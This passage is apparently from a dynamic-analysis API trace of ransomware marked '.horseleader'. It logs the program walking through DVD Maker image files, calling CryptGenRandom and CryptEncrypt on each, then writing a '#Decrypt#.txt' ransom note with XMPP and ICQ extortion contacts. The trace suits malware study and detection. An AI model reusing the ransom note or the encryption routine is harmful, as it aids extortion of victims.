pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.608] CreateFileW 
(lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\button-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.609] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x711e1e3a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x711e1e3a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6bbd, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="button-overlay.png", cAlternateFileName="")) returned 1 [0251.609] lstrcmpiW (lpString1="button-overlay.png", lpString2="Windows") returned -1 [0251.609] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-overlay.png") returned 75 [0251.609] StrStrIW (lpFirst="button-overlay.png", lpSrch=".horseleader") returned 0x0 [0251.609] lstrcmpW (lpString1="button-overlay.png", lpString2="#Decrypt#.txt") returned 1 [0251.609] lstrcmpW (lpString1="button-overlay.png", lpString2="_uninstalling_.png") returned 1 [0251.609] lstrlenW (lpString=".testttjffg") returned 11 [0251.609] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-overlay.png", lpSrch=".testttjffg") returned 0x0 [0251.609] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.609] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.609] CreateFileW 
(lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-overlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\button-overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.610] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71207f97, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71207f97, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb53, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Memories_buttonClear.png", cAlternateFileName="")) returned 1 [0251.610] lstrcmpiW (lpString1="Memories_buttonClear.png", lpString2="Windows") returned -1 [0251.610] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Memories_buttonClear.png") returned 81 [0251.610] StrStrIW (lpFirst="Memories_buttonClear.png", lpSrch=".horseleader") returned 0x0 [0251.610] lstrcmpW (lpString1="Memories_buttonClear.png", lpString2="#Decrypt#.txt") returned 1 [0251.610] lstrcmpW (lpString1="Memories_buttonClear.png", lpString2="_uninstalling_.png") returned 1 [0251.610] lstrlenW (lpString=".testttjffg") returned 11 [0251.610] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Memories_buttonClear.png", lpSrch=".testttjffg") returned 0x0 [0251.610] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.610] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, 
pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.610] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Memories_buttonClear.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\memories_buttonclear.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.611] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7122e0f4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7122e0f4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2a88, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Notes_btn-back-static.png", cAlternateFileName="")) returned 1 [0251.611] lstrcmpiW (lpString1="Notes_btn-back-static.png", lpString2="Windows") returned -1 [0251.611] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_btn-back-static.png") returned 82 [0251.611] StrStrIW (lpFirst="Notes_btn-back-static.png", lpSrch=".horseleader") returned 0x0 [0251.611] lstrcmpW (lpString1="Notes_btn-back-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.611] lstrcmpW (lpString1="Notes_btn-back-static.png", lpString2="_uninstalling_.png") returned 1 [0251.611] lstrlenW (lpString=".testttjffg") returned 11 [0251.611] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_btn-back-static.png", lpSrch=".testttjffg") returned 0x0 [0251.611] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.611] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, 
pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.611] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\notes_btn-back-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.611] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7127a3ae, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7127a3ae, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1a7ed, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Notes_content-background.png", cAlternateFileName="")) returned 1 [0251.611] lstrcmpiW (lpString1="Notes_content-background.png", lpString2="Windows") returned -1 [0251.612] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_content-background.png") returned 85 [0251.612] StrStrIW (lpFirst="Notes_content-background.png", lpSrch=".horseleader") returned 0x0 [0251.612] lstrcmpW (lpString1="Notes_content-background.png", lpString2="#Decrypt#.txt") returned 1 [0251.612] lstrcmpW (lpString1="Notes_content-background.png", lpString2="_uninstalling_.png") returned 1 [0251.612] lstrlenW (lpString=".testttjffg") returned 11 [0251.612] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_content-background.png", lpSrch=".testttjffg") returned 0x0 [0251.612] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.612] 
CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.612] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\notes_content-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.613] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x710b1352, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x710b1352, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x4f7a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="scrapbook.png", cAlternateFileName="")) returned 1 [0251.613] lstrcmpiW (lpString1="scrapbook.png", lpString2="Windows") returned -1 [0251.613] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png") returned 70 [0251.613] StrStrIW (lpFirst="scrapbook.png", lpSrch=".horseleader") returned 0x0 [0251.613] lstrcmpW (lpString1="scrapbook.png", lpString2="#Decrypt#.txt") returned 1 [0251.614] lstrcmpW (lpString1="scrapbook.png", lpString2="_uninstalling_.png") returned 1 [0251.614] lstrlenW (lpString=".testttjffg") returned 11 [0251.614] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png", lpSrch=".testttjffg") returned 0x0 [0251.614] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.614] CryptEncrypt (in: 
hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.614] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\scrapbook.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.614] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x712c6668, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x712c6668, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x390c4, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Title_content-background.png", cAlternateFileName="")) returned 1 [0251.614] lstrcmpiW (lpString1="Title_content-background.png", lpString2="Windows") returned -1 [0251.614] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_content-background.png") returned 85 [0251.614] StrStrIW (lpFirst="Title_content-background.png", lpSrch=".horseleader") returned 0x0 [0251.614] lstrcmpW (lpString1="Title_content-background.png", lpString2="#Decrypt#.txt") returned 1 [0251.615] lstrcmpW (lpString1="Title_content-background.png", lpString2="_uninstalling_.png") returned 1 [0251.615] lstrlenW (lpString=".testttjffg") returned 11 [0251.615] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_content-background.png", lpSrch=".testttjffg") returned 0x0 [0251.615] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: 
pbBuffer=0x32aea98) returned 1 [0251.615] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.615] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\title_content-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.615] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x712ec7c5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x712ec7c5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2c6fe3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1368, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Title_mainImage-mask.png", cAlternateFileName="")) returned 1 [0251.615] lstrcmpiW (lpString1="Title_mainImage-mask.png", lpString2="Windows") returned -1 [0251.615] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_mainImage-mask.png") returned 81 [0251.615] StrStrIW (lpFirst="Title_mainImage-mask.png", lpSrch=".horseleader") returned 0x0 [0251.615] lstrcmpW (lpString1="Title_mainImage-mask.png", lpString2="#Decrypt#.txt") returned 1 [0251.615] lstrcmpW (lpString1="Title_mainImage-mask.png", lpString2="_uninstalling_.png") returned 1 [0251.615] lstrlenW (lpString=".testttjffg") returned 11 [0251.615] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_mainImage-mask.png", lpSrch=".testttjffg") returned 0x0 [0251.616] CryptGenRandom 
(in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.616] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.616] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_mainImage-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\title_mainimage-mask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.616] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x712ec7c5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x712ec7c5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc47, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Title_select-highlight.png", cAlternateFileName="")) returned 1 [0251.616] lstrcmpiW (lpString1="Title_select-highlight.png", lpString2="Windows") returned -1 [0251.616] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_select-highlight.png") returned 83 [0251.616] StrStrIW (lpFirst="Title_select-highlight.png", lpSrch=".horseleader") returned 0x0 [0251.616] lstrcmpW (lpString1="Title_select-highlight.png", lpString2="#Decrypt#.txt") returned 1 [0251.616] lstrcmpW (lpString1="Title_select-highlight.png", lpString2="_uninstalling_.png") returned 1 [0251.616] lstrlenW (lpString=".testttjffg") returned 11 [0251.616] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\Memories\\Title_select-highlight.png", lpSrch=".testttjffg") returned 0x0 [0251.616] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.616] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.616] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_select-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\title_select-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.617] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x712ec7c5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x712ec7c5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc47, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Title_select-highlight.png", cAlternateFileName="")) returned 0 [0251.617] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.618] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\#Decrypt#.txt") returned 70 [0251.618] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 
[0251.623] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.623] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.625] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.625] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.625] CloseHandle (hObject=0x158) returned 1 [0251.625] 
GetProcessHeap () returned 0x780000 [0251.625] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.625] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e96ab6a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e96ab6a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x12ea, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="menu_style_default_Thumbnail.png", cAlternateFileName="")) returned 1 [0251.625] lstrcmpiW (lpString1="menu_style_default_Thumbnail.png", lpString2="Windows") returned -1 [0251.625] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png") returned 80 [0251.625] StrStrIW (lpFirst="menu_style_default_Thumbnail.png", lpSrch=".horseleader") returned 0x0 [0251.625] lstrcmpW (lpString1="menu_style_default_Thumbnail.png", lpString2="#Decrypt#.txt") returned 1 [0251.625] lstrcmpW (lpString1="menu_style_default_Thumbnail.png", lpString2="_uninstalling_.png") returned 1 [0251.625] lstrlenW (lpString=".testttjffg") returned 11 [0251.625] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png", lpSrch=".testttjffg") returned 0x0 [0251.625] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.625] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.625] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png" (normalized: "c:\\program files\\dvd 
maker\\shared\\dvdstyles\\menu_style_default_thumbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.627] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef11f38, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef11f38, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.627] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.627] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png") returned 80 [0251.627] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.627] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.627] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.627] lstrlenW (lpString=".testttjffg") returned 11 [0251.627] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.627] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.627] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, 